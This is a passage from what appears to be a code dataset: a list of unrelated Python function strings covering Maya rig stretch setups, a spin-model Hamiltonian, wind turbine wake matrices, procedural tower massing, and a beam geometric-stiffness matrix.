n='Toony' + setupName + '02OffsetGrp')\n cmds.parent(ctlEnd[0], extraGrpEnd)\n cmds.parent(extraGrpEnd, offGrpEnd)\n cmds.delete(cmds.parentConstraint(bindEndJt, offGrpEnd))\n # parent constraint wiht bind joints.\n cmds.parentConstraint(ctlStart[0], bindStartJt)\n cmds.parentConstraint(ctlEnd[0], bindEndJt)\n # Create connection with node basis.\n crvInfo = cmds.createNode('curveInfo', n='curveInfo_Toony' + setupName)\n shpCrv = cmds.listRelatives('IKSplineCurve_' + setupName, s=True)\n cmds.connectAttr(shpCrv[0] + '.worldSpace[0]', crvInfo + '.inputCurve', f=True)\n mdnForSX = cmds.createNode('multiplyDivide', n='multiplyDivide_Toony' + setupName + '_ScaleX')\n mdnForPW = cmds.createNode('multiplyDivide', n='multiplyDivide_Toony' + setupName + '_Power')\n mdnForYZ = cmds.createNode('multiplyDivide', n='multiplyDivide_Toony' + setupName + '_ScaleYZ')\n cmds.setAttr(mdnForSX + '.operation', 2)\n cmds.setAttr(mdnForPW + '.operation', 3)\n cmds.setAttr(mdnForYZ + '.operation', 2)\n # connections.\n cmds.connectAttr(crvInfo + '.arcLength', mdnForSX + '.input1X', f=True)\n cmds.setAttr(mdnForSX + '.input2X', cmds.getAttr(mdnForSX + '.input1X'))\n scaledJoint = chain[:-1]\n for each in scaledJoint:\n cmds.connectAttr(mdnForSX + '.outputX', each + '.sx', f=True)\n # power connections.\n cmds.connectAttr(mdnForSX + '.outputX', mdnForPW + '.input1X', f=True)\n cmds.setAttr(mdnForPW + '.input2X', 0.5)\n cmds.connectAttr(mdnForPW + '.outputX', mdnForYZ + '.input2X', f=True)\n cmds.setAttr(mdnForYZ + '.input1X', 1)\n for each in scaledJoint:\n cmds.connectAttr(mdnForYZ + '.outputX', each + '.sy')\n cmds.connectAttr(mdnForYZ + '.outputX', each + '.sz')\n # TODO: need to full proof this function.", "def glueEmH( Ja, Jf, truncNum = scipy.inf ):\n w, v = truncBasisH( Ja, truncNum )\n sPlus, sMinus, sZ = sPlusAndMinusAndZ( v )\n \n H1 = scipy.zeros( ( len(w)**4, len(w)**4 ) )\n \n for n in range( len(w)**4 ):\n # Diagonal previous generation contributions\n o = oct(n)[-4:].zfill(4)\n o = [int(char) for char in o]\n o_A, o_B, o_C, o_D = o\n \n H1[n, n] += scipy.sum( [ w[ i ] for i in o ] )\n \n # Edge terms\n for np in range( n, len(w)**4 ):\n op = 
oct(np)[-4:].zfill(4)\n op = [int(char) for char in op]\n op_A, op_B, op_C, op_D = op\n \n x = 0.\n if ( (o_B == op_B) and (o_C == op_C) ):\n x += -Jf * ( .5 * ( sPlus[0][o_A, op_A] * sMinus[0][o_D, op_D] + sMinus[0][o_A, op_A] * sPlus[0][o_D,op_D] ) + sZ[0][o_A, op_A] * sZ[0][o_D, op_D] )\n if ( (o_C == op_C) and (o_A == op_A) ):\n x += -Jf * ( .5 * ( sPlus[1][o_B, op_B] * sMinus[1][o_D, op_D] + sMinus[1][o_B, op_B] * sPlus[1][o_D,op_D] ) + sZ[1][o_B, op_B] * sZ[1][o_D, op_D] )\n if ( (o_A == op_A) and (o_B == op_B) ):\n x += -Jf * ( .5 * ( sPlus[2][o_C, op_C] * sMinus[2][o_D, op_D] + sMinus[2][o_C, op_C] * sPlus[1][o_D,op_D] ) + sZ[1][o_C, op_C] * sZ[2][o_D, op_D] )\n \n H1[n, np] = x\n H1[np, n] = x\n \n return H1", "def glow_boundary(bound):\n assert bound < 4\n global layout\n temp = len(layout) - 1\n for i in range(bound, bound + len_square(bound)):\n for j in range(bound, bound + len_square(bound)): # TODO: assign this to a variable\t\n layout[i][j] = 1", "def set_own_wake(cls):\r\n \"\"\" EXECUTE THIS FUNCTION IN THE FARM CLASS! \"\"\"\r\n\r\n # alias:\r\n N = Turbine.N\r\n F = Turbine.F\r\n t = Turbine.t\r\n \r\n cls.wn = np.zeros((N, N), dtype=float)\r\n cls.wt = np.zeros((N, N), dtype=float)\r\n \r\n # fill the normal loads wake matrix (lower half):\r\n right_index = (np.arange(N/2, N)).astype(int)\r\n left_index = (np.arange(N/2 - 1, -1, -1)).astype(int)\r\n cls.wn[right_index, right_index] = 1.00\r\n cls.wn[right_index, left_index] = -1.00\r\n \r\n # fill the tangential loads wake matrix (lower half):\r\n Y = F*np.cos(t[N//2+1: N-1]) \r\n cls.wt[right_index[1:-1], right_index[1:-1]] = -Y/np.sqrt(1.0 - Y**2)\r\n cls.wt[right_index[1:-1], left_index[1:-1]] = -Y/np.sqrt(1.0 - Y**2)\r\n \r\n # the [1:-1] means that the head and tail are omitted due to the fact\r\n # that Y would yield values greater than 1 in the poles, thereby \r\n # leading to singularities (-Y/(1 - Y^2)^(1/2)).\r", "def aecSpaceRandomTowers():\n origin = aecPoint(0, 0, 0)\n displace = 175\n spacer = aecSpacer()\n shaper = aecShaper()\n \n def full(point, xWidth, yDepth, zHeight, level):\n floor = aecSpace()\n floor.boundary = shaper.makeBox(point, xWidth, yDepth)\n floor.height = zHeight\n floor.level = level\n setColors([floor])\n return [floor]\n \n def halfDepth(point, xWidth, yDepth, zHeight, level):\n depth = yDepth * 0.5\n half1 = aecSpace() \n half1.boundary = shaper.makeBox(point, xWidth, depth)\n half1.height = zHeight\n half1.level = level\n halfSpaces = [half1] + spacer.row(half1, xAxis = False)\n setColors(halfSpaces)\n return halfSpaces\n \n def halfWidth(point, xWidth, yDepth, zHeight, level):\n width = xWidth * 0.5\n half1 = aecSpace() \n half1.boundary = shaper.makeBox(point, width, yDepth)\n half1.height = zHeight\n half1.level = level\n halfSpaces = [half1] + spacer.row(half1)\n setColors(halfSpaces)\n return halfSpaces\n \n def quarterDepth(point, xWidth, yDepth, zHeight, level):\n if randint(0, 1) == 0:\n depth = yDepth * 0.25\n scale = 3\n else:\n depth = yDepth * 0.75\n scale = 0.333333333 \n half1 = aecSpace() \n half1.boundary = shaper.makeBox(point, xWidth, depth)\n half1.height = zHeight\n half1.level = level \n halfSpaces = [half1] + spacer.row(half1, xAxis = False)\n halfSpaces[1].scale(1, scale, 1, halfSpaces[1].points_floor[0])\n setColors(halfSpaces)\n return halfSpaces\n \n def quarterWidth(point, xWidth, yDepth, zHeight, level):\n if randint(0, 1) == 0:\n width = xWidth * 0.25\n scale = 3\n else:\n width = xWidth * 0.75\n scale = 0.333333333 \n half1 = aecSpace() \n 
half1.boundary = shaper.makeBox(point, width, yDepth)\n half1.height = zHeight\n half1.level = level \n halfSpaces = [half1] + spacer.row(half1)\n halfSpaces[1].scale(scale, 1, 1, halfSpaces[1].points_floor[0])\n setColors(halfSpaces)\n return halfSpaces\n \n def setColors(halfSpaces):\n colors = [aecColor.blue, aecColor.orange, aecColor.purple, aecColor.yellow]\n colorPick = randint(0, 3)\n halfSpaces[0].color = colors[colorPick]\n if len(halfSpaces) == 1: return\n colors.reverse()\n halfSpaces[1].color = colors[colorPick]\n \n def makeFloor(point, xWidth, yDepth, zHeight, level):\n floorType = randint(0, 4)\n if floorType == 0: floorSpaces = full(point, xWidth, yDepth, zHeight, level)\n if floorType == 1: floorSpaces = halfDepth(point, xWidth, yDepth, zHeight, level)\n if floorType == 2: floorSpaces = halfWidth(point, xWidth, yDepth, zHeight, level)\n if floorType == 3: floorSpaces = quarterDepth(point, xWidth, yDepth, zHeight, level)\n if floorType == 4: floorSpaces = quarterWidth(point, xWidth, yDepth, zHeight, level)\n return floorSpaces\n \n def makeCore(point, xWidth, yDepth, zHeight): \n xCoord = (point.x - 5) + (xWidth * 0.5)\n yCoord = (point.y + (yDepth * (randint(0, 9) * 0.1)))\n point = aecPoint(xCoord, yCoord, point.z)\n core = aecSpace()\n core.boundary = shaper.makeBox(point, 10, 20)\n core.height = zHeight\n core.color = aecColor.gray\n return [core]\n \n def makeTower(point):\n floors = []\n xWidth = uniform(20, 60)\n yDepth = uniform(20, 60)\n levels = randint(5, 50)\n zHeight = uniform(3, 6)\n plinth = aecSpace()\n plinth.boundary = shaper.makeBox(point, xWidth, yDepth)\n plinthScaleX = (uniform(1, 2.5))\n plinthScaleY = (uniform(1, 2.5))\n plinth.scale(plinthScaleX, plinthScaleY, 2, plinth.centroid_floor)\n plinth.height = (zHeight * 2)\n plinth.color = aecColor.green\n floors.append(plinth)\n floors = floors + makeCore(point, xWidth, yDepth, zHeight * (levels + 3))\n level = (zHeight * 2)\n x = 0\n while x < levels:\n floors = floors + makeFloor(point, xWidth, yDepth, zHeight, level)\n level += zHeight\n x += 1 \n return floors\n \n def makeTowerRow(point, columns, displacement):\n towers = []\n towers = towers + makeTower(point)\n x = 0\n while x < columns:\n point.x += displacement\n towers = towers + makeTower(point)\n x += 1\n return towers\n \n def makeTowerRows(point, displacement, columns, rows):\n towers = []\n x = 0\n while x < rows:\n towers = towers + makeTowerRow(point, columns, displacement)\n point.x = 0\n point.y += displacement\n x += 1\n return towers\n \n return makeTowerRows(origin, displace, 4, 5)", "def frame3dlin_Kg(E,A1,A2,L,Te1,Te2,R=None):\n Kge1= np.array([\n [0 , 0 , 0 , 0 , 0 , 0 , 0 , 0 , 0 , 0 , 0 , 0],\n [0 , -((3*A2+3*A1)*E)/(5*L**2) , 0 , 0 , 0 , -(A2*E)/(10*L) , 0 , ((3*A2+3*A1)*E)/(5*L**2) , 0 , 0 , 0 , -(A1*E)/(10*L)],\n [0 , 0 , -((3*A2+3*A1)*E)/(5*L**2) , 0 , (A2*E)/(10*L) , 0 , 0 , 0 , ((3*A2+3*A1)*E)/(5*L**2) , 0 , (A1*E)/(10*L) , 0],\n [0 , 0 , 0 , 0 , 0 , 0 , 0 , 0 , 0 , 0 , 0 , 0],\n [0 , 0 , (A2*E)/(10*L) , 0 , -((A2+3*A1)*E)/30 , 0 , 0 , 0 , -(A2*E)/(10*L) , 0 , ((A2+A1)*E)/60 , 0],\n [0 , -(A2*E)/(10*L) , 0 , 0 , 0 , -((A2+3*A1)*E)/30 , 0 , (A2*E)/(10*L) , 0 , 0 , 0 , ((A2+A1)*E)/60],\n [0 , 0 , 0 , 0 , 0 , 0 , 0 , 0 , 0 , 0 , 0 , 0],\n [0 , ((3*A2+3*A1)*E)/(5*L**2) , 0 , 0 , 0 , (A2*E)/(10*L) , 0 , -((3*A2+3*A1)*E)/(5*L**2) , 0 , 0 , 0 , (A1*E)/(10*L)],\n [0 , 0 , ((3*A2+3*A1)*E)/(5*L**2) , 0 , -(A2*E)/(10*L) , 0 , 0 , 0 , -((3*A2+3*A1)*E)/(5*L**2) , 0 , -(A1*E)/(10*L) , 0],\n [0 , 0 , 0 , 0 , 0 , 0 , 0 , 0 , 0 , 0 , 0 , 
0],\n [0 , 0 , (A1*E)/(10*L) , 0 , ((A2+A1)*E)/60 , 0 , 0 , 0 , -(A1*E)/(10*L) , 0 , -((3*A2+A1)*E)/30 , 0],\n [0 , -(A1*E)/(10*L) , 0 , 0 , 0 , ((A2+A1)*E)/60 , 0 , (A1*E)/(10*L) , 0 , 0 , 0 , -((3*A2+A1)*E)/30]\n ])\n Kge2= np.array([\n [0 , 0 , 0 , 0 , 0 , 0 , 0 , 0 , 0 , 0 , 0 , 0],\n [0 , ((3*A2+3*A1)*E)/(5*L**2) , 0 , 0 , 0 , (A2*E)/(10*L) , 0 , -((3*A2+3*A1)*E)/(5*L**2) , 0 , 0 , 0 , (A1*E)/(10*L)],\n [0 , 0 , ((3*A2+3*A1)*E)/(5*L**2) , 0 , -(A2*E)/(10*L) , 0 , 0 , 0 , -((3*A2+3*A1)*E)/(5*L**2) , 0 , -(A1*E)/(10*L) , 0],\n [0 , 0 , 0 , 0 , 0 , 0 , 0 , 0 , 0 , 0 , 0 , 0],\n [0 , 0 , -(A2*E)/(10*L) , 0 , ((A2+3*A1)*E)/30 , 0 , 0 , 0 , (A2*E)/(10*L) , 0 , -((A2+A1)*E)/60 , 0],\n [0 , (A2*E)/(10*L) , 0 , 0 , 0 , ((A2+3*A1)*E)/30 , 0 , -(A2*E)/(10*L) , 0 , 0 , 0 , -((A2+A1)*E)/60],\n [0 , 0 , 0 , 0 , 0 , 0 , 0 , 0 , 0 , 0 , 0 , 0],\n [0 , -((3*A2+3*A1)*E)/(5*L**2) , 0 , 0 , 0 , -(A2*E)/(10*L) , 0 , ((3*A2+3*A1)*E)/(5*L**2) , 0 , 0 , 0 , -(A1*E)/(10*L)],\n [0 , 0 , -((3*A2+3*A1)*E)/(5*L**2) , 0 , (A2*E)/(10*L) , 0 , 0 , 0 , ((3*A2+3*A1)*E)/(5*L**2) , 0 , (A1*E)/(10*L) , 0],\n [0 , 0 , 0 , 0 , 0 , 0 , 0 , 0 , 0 , 0 , 0 , 0],\n [0 , 0 , -(A1*E)/(10*L) , 0 , -((A2+A1)*E)/60 , 0 , 0 , 0 , (A1*E)/(10*L) , 0 , ((3*A2+A1)*E)/30 , 0],\n [0 , (A1*E)/(10*L) , 0 , 0 , 0 , -((A2+A1)*E)/60 , 0 , -(A1*E)/(10*L) , 0 , 0 , 0 , ((3*A2+A1)*E)/30]])\n\n Kg = Kge1*Te1 + Kge2*Te2\n\n if (R is not None):\n RR = scipy.linalg.block_diag(R,R,R,R)\n Kg = np.transpose(RR).dot(Kg.dot(RR))\n\n return Kg", "def biped_stretch(ik_ctrl,\n ik_last_node,\n pv_ctrl,\n switch_ctrl,\n up_arm_fk_ctrl,\n lo_arm_fk_ctrl,\n wrist_fk_ctrl,\n up_arm_ik_jnt,\n lo_arm_ik_jnt,\n wrist_ik_jnt,\n ik_handle,\n pin_attr_name='pinElbow',\n shift_attr_name='shiftElbow'):\n\n # add all my attrs on ctrls\n mc.addAttr(ik_ctrl, ln=pin_attr_name, at='double', min=0, max=1, k=1)\n mc.addAttr(ik_ctrl, ln=shift_attr_name, at='double', min=-1, max=1, k=1)\n\n mc.addAttr(ik_ctrl, ln='autoStretch', at='double', min=0, max=1, k=1)\n mc.addAttr(ik_ctrl, ln='upStretch', at='double', dv=1, min=0.001, k=1)\n mc.addAttr(ik_ctrl, ln='loStretch', at='double', dv=1, min=0.001, k=1)\n\n mc.addAttr(up_arm_fk_ctrl, ln='stretch', at='double', dv=1, min=0.001, k=1)\n mc.addAttr(lo_arm_fk_ctrl, ln='stretch', at='double', dv=1, min=0.001, k=1)\n\n # store initial length of joint\n lo_init_length = mc.getAttr(lo_arm_ik_jnt+'.tx')\n wrist_init_length = mc.getAttr(wrist_ik_jnt+'.tx')\n max_init_length = mc.getAttr(lo_arm_ik_jnt+'.tx')+mc.getAttr(wrist_ik_jnt+'.tx')\n\n lo_abs_init_length = abs(mc.getAttr(lo_arm_ik_jnt+'.tx'))\n wrist_abs_length = abs(mc.getAttr(wrist_ik_jnt+'.tx'))\n\n # Get parents for ik handle and root of the parm\n arm_root_grp = utils.get_parent(up_arm_ik_jnt)\n\n # Create distance nodes between base, end, and pv ctrl to get the length of side of the triangle\n root_to_end_dist = utils.create_distance_reader(arm_root_grp, ik_last_node)\n root_to_pv_dist = utils.create_distance_reader(arm_root_grp, pv_ctrl)\n pv_to_end_dist = utils.create_distance_reader(pv_ctrl, ik_last_node)\n\n # easy stuff first - create fk stretch nodes\n lo_arm_fk_mdl = mc.createNode('multDoubleLinear')\n wrist_fk_mdl = mc.createNode('multDoubleLinear')\n\n mc.setAttr(lo_arm_fk_mdl+'.input1', mc.getAttr(lo_arm_ik_jnt+'.tx'))\n mc.setAttr(wrist_fk_mdl+'.input1', mc.getAttr(wrist_ik_jnt+'.tx'))\n mc.connectAttr(up_arm_fk_ctrl+'.stretch', lo_arm_fk_mdl+'.input2')\n mc.connectAttr(lo_arm_fk_ctrl+'.stretch', wrist_fk_mdl+'.input2')\n\n utils.connect_abs(lo_arm_fk_mdl+'.output', 
lo_arm_fk_ctrl+'_ZERO.tx')\n if wrist_fk_ctrl and mc.objExists(wrist_fk_ctrl):\n utils.connect_abs(wrist_fk_mdl+'.output', wrist_fk_ctrl+'_ZERO.tx')\n\n # These arethe final fk stretch outputs to connect to joints\n fk_stretch_final_output = [lo_arm_fk_mdl+'.output', wrist_fk_mdl+'.output']\n\n # NOW creates node s for thew elbow pin\n lo_arm_pin_mdl = mc.createNode('multDoubleLinear')\n wrist_pin_mdl = mc.createNode('multDoubleLinear')\n\n mc.setAttr(lo_arm_pin_mdl+'.input1', 1)\n mc.setAttr(wrist_pin_mdl+'.input1', 1)\n\n if lo_init_length < 0.0:\n mc.setAttr(lo_arm_pin_mdl+'.input1', -1)\n\n if wrist_init_length < 0.0:\n mc.setAttr(wrist_pin_mdl+'.input1', -1)\n\n mc.connectAttr(root_to_pv_dist+'.localDistance', lo_arm_pin_mdl+'.input2')\n mc.connectAttr(pv_to_end_dist+'.localDistance', wrist_pin_mdl+'.input2')\n\n # These arethe final elbow pin stretch outputs to connect to joints\n pin_final_output = [lo_arm_pin_mdl+'.output', wrist_pin_mdl+'.output']\n\n # create shift nodes\n mc.addAttr(lo_arm_ik_jnt, ln='shiftLength', k=1)\n mc.addAttr(wrist_ik_jnt, ln='shiftLength', k=1)\n\n tt = 'linear'\n mc.setDrivenKeyframe(lo_arm_ik_jnt+'.shiftLength', cd=ik_ctrl+'.'+shift_attr_name, dv=0, v=lo_init_length, itt=tt, ott=tt)\n mc.setDrivenKeyframe(lo_arm_ik_jnt+'.shiftLength', cd=ik_ctrl+'.'+shift_attr_name, dv=1, v=0, itt=tt, ott=tt)\n mc.setDrivenKeyframe(lo_arm_ik_jnt+'.shiftLength', cd=ik_ctrl+'.'+shift_attr_name, dv=-1, v=max_init_length, itt=tt, ott=tt)\n\n mc.setDrivenKeyframe(wrist_ik_jnt+'.shiftLength', cd=ik_ctrl+'.'+shift_attr_name, dv=0, v=wrist_init_length, itt=tt, ott=tt)\n mc.setDrivenKeyframe(wrist_ik_jnt+'.shiftLength', cd=ik_ctrl+'.'+shift_attr_name, dv=1, v=max_init_length, itt=tt, ott=tt)\n mc.setDrivenKeyframe(wrist_ik_jnt+'.shiftLength', cd=ik_ctrl+'.'+shift_attr_name, dv=-1, v=0, itt=tt, ott=tt)\n\n shift_final_output = [ lo_arm_ik_jnt+'.shiftLength', wrist_ik_jnt+'.shiftLength']\n\n # Create ik indivisual stretch nodes\n lo_arm_ik_scale_mdl = mc.createNode('multDoubleLinear')\n wrist_ik_scale_mdl = mc.createNode('multDoubleLinear')\n\n mc.connectAttr(shift_final_output[0], lo_arm_ik_scale_mdl+'.input1')\n mc.connectAttr(shift_final_output[1], wrist_ik_scale_mdl+'.input1')\n mc.connectAttr(ik_ctrl+'.upStretch', lo_arm_ik_scale_mdl+'.input2')\n mc.connectAttr(ik_ctrl+'.loStretch', wrist_ik_scale_mdl+'.input2')\n\n # This is the final output for scale and shift\n ik_stretch_final_output = [lo_arm_ik_scale_mdl+'.output', wrist_ik_scale_mdl+'.output']\n\n # Now create the IK auto stretch nodes\n lo_auto_stretch_mdl = mc.createNode('multDoubleLinear')\n wrist_auto_stretch_mdl = mc.createNode('multDoubleLinear')\n\n auto_stretch_clamp = mc.createNode('clamp')\n mc.setAttr(auto_stretch_clamp+'.minR', 1)\n mc.setAttr(auto_stretch_clamp+'.maxR', 10000000)\n\n mc.connectAttr(ik_stretch_final_output[0], lo_auto_stretch_mdl+'.input1', f=1)\n mc.connectAttr(ik_stretch_final_output[1], wrist_auto_stretch_mdl+'.input1', f=1)\n mc.connectAttr(root_to_end_dist+'.stretchFactor', auto_stretch_clamp+'.inputR')\n\n mc.connectAttr(auto_stretch_clamp+'.outputR', lo_auto_stretch_mdl+'.input2', f=1)\n mc.connectAttr(auto_stretch_clamp+'.outputR', wrist_auto_stretch_mdl+'.input2', f=1)\n\n adl = mc.createNode('addDoubleLinear')\n mc.connectAttr(lo_arm_ik_scale_mdl+'.output', adl+'.input1')\n mc.connectAttr(wrist_ik_scale_mdl+'.output', adl+'.input2')\n utils.connect_abs(adl+'.output', root_to_end_dist+'.jointChainLength')\n\n # handle soft ik handle constraint override\n pc = 
mc.pointConstraint(ik_last_node, ik_handle)[0]\n if mc.objExists(up_arm_ik_jnt+'.softIkChainLength'):\n\n # compensate feed in new chain length for soft ik chain length\n utils.connect_abs(adl+'.output', up_arm_ik_jnt+'.softIkChainLength')\n\n # blend off the soft ik constraint IF im in auto s tretch or pin mode\n mdl = mc.createNode('multDoubleLinear')\n utils.connect_reverse(ik_ctrl+'.'+pin_attr_name, mdl+'.input1')\n utils.connect_reverse(ik_ctrl+'.autoStretch', mdl+'.input2')\n mc.connectAttr(mdl+'.output', pc+'.w0')\n utils.connect_reverse(pc+'.w0', pc+'.w1')\n\n ik_auto_stretch_final_output = [lo_auto_stretch_mdl+'.output', wrist_auto_stretch_mdl+'.output']\n\n # now create all my blends\n\n # first blend btween FK and an empty ik input\n # (this ikl input will take another blend node for blending oall the IK options )\n fk_to_ik_blend = mc.createNode('blendColors')\n\n mc.connectAttr(switch_ctrl+'.IK', fk_to_ik_blend+'.blender')\n mc.connectAttr(fk_stretch_final_output[0], fk_to_ik_blend+'.color2R')\n mc.connectAttr(fk_stretch_final_output[1], fk_to_ik_blend+'.color2G')\n\n # now create a blender between pin elbow and the rest of the ik options\n auto_ik_blend = mc.createNode('blendColors')\n\n mc.connectAttr(ik_ctrl+'.autoStretch', auto_ik_blend+'.blender')\n mc.connectAttr(ik_auto_stretch_final_output[0], auto_ik_blend+'.color1R')\n mc.connectAttr(ik_auto_stretch_final_output[1], auto_ik_blend+'.color1G')\n\n # Now connect it toth fk blend\n mc.connectAttr(auto_ik_blend+'.outputR', fk_to_ik_blend+'.color1R')\n mc.connectAttr(auto_ik_blend+'.outputG', fk_to_ik_blend+'.color1G')\n\n # now create a blender between pin elbow and the rest of the ik options\n pin_ik_blend = mc.createNode('blendColors')\n\n mc.connectAttr(ik_ctrl+'.'+pin_attr_name, pin_ik_blend+'.blender')\n mc.connectAttr(pin_final_output[0], pin_ik_blend+'.color1R')\n mc.connectAttr(pin_final_output[1], pin_ik_blend+'.color1G')\n\n # Now connect it toth fk blend\n mc.connectAttr(pin_ik_blend+'.outputR', auto_ik_blend+'.color2R')\n mc.connectAttr(pin_ik_blend+'.outputG', auto_ik_blend+'.color2G')\n\n # now connect the shift and scale\n mc.connectAttr(ik_stretch_final_output[0], pin_ik_blend+'.color2R')\n mc.connectAttr(ik_stretch_final_output[1], pin_ik_blend+'.color2G')\n\n # now for the magic! 
Connect the blend networll to joints\n mc.connectAttr(fk_to_ik_blend+'.outputR', lo_arm_ik_jnt+'.tx')\n mc.connectAttr(fk_to_ik_blend+'.outputG', wrist_ik_jnt+'.tx')", "def multi_joint_stretch(ik_ctrl, ik_last_node, switch_ctrl, fk_ctrls, jnts, ik_handle):\n\n root_grp = utils.get_parent(jnts[0])\n stretch_jnts = jnts[1:]\n stretch_fk_ctrls = fk_ctrls[1:]\n\n # create attrs\n attrs = ['upStretch','loStretch']\n for i in reversed(range(len(stretch_jnts)-2)):\n ltr = ''\n if i > 0:\n ltr = utils.letters[i]\n\n attrs.insert(1, 'midStretch'+ltr)\n\n if not mc.objExists(ik_ctrl+'.autoStretch'):\n mc.addAttr(ik_ctrl, ln='autoStretch', at='double', min=0, max=1, k=1)\n\n for i in range(len(stretch_jnts)):\n if not mc.objExists(ik_ctrl+'.'+attrs[i]):\n mc.addAttr(ik_ctrl, ln=attrs[i], at='double', dv=1, min=0.001, k=1)\n\n for fk_ctrl in fk_ctrls[:-1]:\n if not mc.objExists(fk_ctrl+'.stretch'):\n mc.addAttr(fk_ctrl, ln='stretch', at='double', dv=1, min=0.001, k=1)\n\n # store initial length of joint\n init_lengths = [mc.getAttr(j+'.tx') for j in stretch_jnts]\n abs_init_lengths = [abs(v) for v in init_lengths]\n\n total_init_length = 0\n for v in init_lengths:\n total_init_length += v\n\n abs_total_init_length = abs(total_init_length)\n\n # Create dist reader\n root_to_end_dist = utils.create_distance_reader(root_grp, ik_last_node)\n\n auto_stretch_clamp = mc.createNode('clamp')\n mc.setAttr(auto_stretch_clamp+'.minR', 1)\n mc.setAttr(auto_stretch_clamp+'.maxR', 10000000)\n mc.connectAttr(root_to_end_dist+'.stretchFactor', auto_stretch_clamp+'.inputR')\n\n mc.addAttr(ik_ctrl, ln='stretchFactor', k=0)\n mc.connectAttr(auto_stretch_clamp+'.inputR', ik_ctrl+'.stretchFactor')\n\n pma = mc.createNode('plusMinusAverage')\n utils.connect_abs(pma+'.output1D', root_to_end_dist+'.jointChainLength')\n\n # handle soft ik handle constraint override\n pc = mc.pointConstraint(ik_last_node, ik_handle)[0]\n if mc.objExists(jnts[0]+'.softIkChainLength'):\n\n # compensate chain length - feed in new chain length for soft ik chain length\n utils.connect_abs(pma+'.output1D', jnts[0]+'.softIkChainLength')\n\n # blend off the soft ik constraint IF im in auto stretch\n mc.connectAttr(ik_ctrl+'.autoStretch', pc+'.w1')\n utils.connect_reverse(pc+'.w1', pc+'.w0')\n\n # easy stuff first - create fk stretch nodes\n fk_to_ik_blends = [] # This is the final output for IK stretch\n\n for i, jnt in enumerate(stretch_jnts):\n\n # easy stuff first - create fk stretch nodes\n fk_mdl = mc.createNode('multDoubleLinear')\n mc.setAttr(fk_mdl+'.input1', mc.getAttr(jnt+'.tx'))\n mc.connectAttr(fk_ctrls[i]+'.stretch', fk_mdl+'.input2')\n utils.connect_abs(fk_mdl+'.output', fk_ctrls[i+1]+'_ZERO.tx')\n\n # Create user secifed IK stretch\n user_ik_scale_mdl = mc.createNode('multDoubleLinear')\n mc.setAttr( user_ik_scale_mdl+'.input1', init_lengths[i])\n mc.connectAttr(ik_ctrl+'.'+attrs[i], user_ik_scale_mdl+'.input2')\n\n # Now create the IK auto stretch nodes\n auto_stretch_mdl = mc.createNode('multDoubleLinear')\n mc.connectAttr(user_ik_scale_mdl+'.output', auto_stretch_mdl+'.input1', f=1)\n mc.connectAttr(auto_stretch_clamp+'.outputR', auto_stretch_mdl+'.input2', f=1)\n mc.connectAttr(user_ik_scale_mdl+'.output', '{0}.input1D[{1}]'.format(pma, i))\n\n fk_to_ik_blend = mc.createNode('blendTwoAttr')\n auto_stretch_blend = mc.createNode('blendTwoAttr')\n\n mc.connectAttr(switch_ctrl+'.IK', fk_to_ik_blend+'.attributesBlender')\n mc.connectAttr(fk_mdl+'.output', fk_to_ik_blend+'.input[0]')\n mc.connectAttr(auto_stretch_blend+'.output', 
fk_to_ik_blend+'.input[1]')\n\n mc.connectAttr(ik_ctrl+'.autoStretch', auto_stretch_blend+'.attributesBlender')\n mc.connectAttr(user_ik_scale_mdl+'.output', auto_stretch_blend+'.input[0]')\n mc.connectAttr(auto_stretch_mdl+'.output', auto_stretch_blend+'.input[1]')\n\n fk_to_ik_blends.append(fk_to_ik_blend+'.output')\n\n for i, jnt in enumerate(stretch_jnts):\n mc.connectAttr(fk_to_ik_blends[i], jnt+'.tx')", "def stretch_factor(self):\n p = self._pants_decomposition\n\n # pick a curve to iterate\n c = PantsLamination.random(p)\n # print(c)\n\n cc = (self**100) * c\n # print(self**100)\n # print(cc)\n return float(sum(abs(x) for x in (self*cc).to_vector())) / \\\n sum(abs(x) for x in cc.to_vector())", "def GetScaleBlocks(width):\n\n rord=numpy.log10(abs(width)/2.0)\n nrord=rord % 1\n\n if nrord < numpy.log10(2):\n spc=0.2*pow(10,numpy.floor(rord))\n smallspc=spc\n bigspc=5*spc\n newspc=[0,smallspc,smallspc*2,smallspc*3,smallspc*4,smallspc*5]\n elif nrord < numpy.log10(5):\n spc=0.5*pow(10,numpy.floor(rord))\n smallspc=spc\n bigspc=5*spc\n newspc=[0,smallspc,smallspc*2,smallspc*3,smallspc*4]\n else:\n spc=pow(10,numpy.floor(rord))\n smallspc=spc\n bigspc=spc*5\n newspc=[0,smallspc,smallspc*2,smallspc*3,smallspc*4,smallspc*5]\n\n if len(newspc) == 5:\n #labels=['0',None,\"%g\" % smallspc*2,None,\"%g\" % (smallspc*4)]\n labels=['0',None,None,None,\"%g\" % (smallspc*4)]\n else:\n labels=['0',None,None,None,None,\"%g\" % (smallspc*5)]\n\n temp_max=newspc[len(newspc)-1]\n start=temp_max\n for temp in numpy.arange(start,width-bigspc/2,bigspc):\n temp_max=temp_max+bigspc\n newspc.append(temp_max)\n labels.append(\"%g\" % temp_max)\n\n #start=temp_max\n #for temp in Numeric.arange(start,width-smallspc/2,smallspc):\n # labels.append(None)\n # temp_max=temp_max+smallspc \n # newspc.append(temp_max) \n\n return (numpy.array(newspc,numpy.float32),labels)", "def approx_shoulders(upper_body_roi):\n height = upper_body_roi.shape[0]; width = upper_body_roi.shape[1]\n return (int(width / 6), int((height / 4) * 3)), (int((width / 6) * 5), int((height / 4) * 3))", "def other_wakes(self, current, *turbines):\r\n \"\"\" EXECUTE THIS FUNCTION IN THE FARM CLASS! 
\"\"\"\r\n self.nodisplacements = []\r\n self.procedures = []\r\n \r\n # blockage matrices:\r\n self.bn = []\r\n self.bt = []\r\n \r\n for i, turbine in enumerate(turbines):\r\n # append the own wake matrices when the current turbine is \r\n # compared to itself:\r\n \r\n if i == current:\r\n self.bn.append(Turbine.wn)\r\n self.bt.append(Turbine.wt)\r\n elif i != current:\r\n # it is shadowed when at least one control point of the current\r\n # turbine lies in the direct wake of the i-th turbine.\r\n self.shadowed = np.any((self.yi[i]>=-1) & (self.yi[i]<=1))\r\n self.behind = self.x0 > turbine.x0\r\n \r\n if (self.shadowed and self.behind):\r\n # compute obstruction matrices:\r\n self.set_templates(self.yi[i])\r\n self.offset_templates(i, turbine)\r\n \r\n # offsetted block matrices are appended to the list:\r\n self.bn.append(self.newQn)\r\n self.bt.append(self.newQt)\r\n else:\r\n # add empty blockage matrices if there is no obstruction:\r\n self.bn.append(np.copy(Turbine.zeros))\r\n self.bt.append(np.copy(Turbine.zeros))", "def rectangulization(nL, indices, indices_agg, ML_iot_0, 